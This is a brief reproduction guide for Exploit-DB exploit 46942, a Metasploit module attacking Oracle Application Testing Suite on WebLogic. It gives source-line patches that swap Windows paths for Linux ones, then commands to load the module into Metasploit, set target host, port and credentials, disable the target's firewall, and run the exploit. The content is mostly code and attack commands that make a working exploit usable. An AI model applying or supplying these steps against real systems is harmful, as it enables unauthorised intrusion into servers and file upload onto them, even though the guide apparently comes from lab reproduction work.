Source of this exp: https://www.exploit-db.com/exploits/46942
In fact, this exp can be reproduced successfully in the Linux environment, but you need to change the source code downloaded from the official website;
Source code line 62, you can see that the last item is the path representation method under Windows system, which needs to be changed to the corresponding path under Linux system
OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
#用如下代码替换
OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS','/root/Oracle/Middleware/user_projects/domains/'])Source code line 187, ibid
app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
#用如下代码替换
app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, 'base_domain/servers/AdminServer/upload')Source code line 238, same as above
app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
#用如下代码替换
app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, "base_domain/servers/AdminServer/upload/#{war_name}.war")Next, import the script into metasploit: go to the parent directory of the script (here I name the script 1.rb, here one is replaced with your own script name)
sudo cp 1.rb /opt/metasploit-framework/embedded/framework/modules/exploits/
sudo chmod +x /opt/metasploit-framework/embedded/framework/modules/exploits/1.rbOpen metasploit in the terminal and reload all scripts
reload_all
#因为我将脚本命名为1.rb,所以metasploit导入脚本之后将其标记为1
use exploits/1
#可以看一下此脚本需要设置哪些参数
show options
#设置脚本需要的参数
set RHOSTS <ip>
set RPORT <port>
set OATSUSERNAME <weblogic_user_name>
set OATSPASSWORD <password>For the target machine, you need to install the weblogic version that meets the requirements; then close the firewall; then follow the above commands on the attack machine:
exploitThe attack effect is as follows:
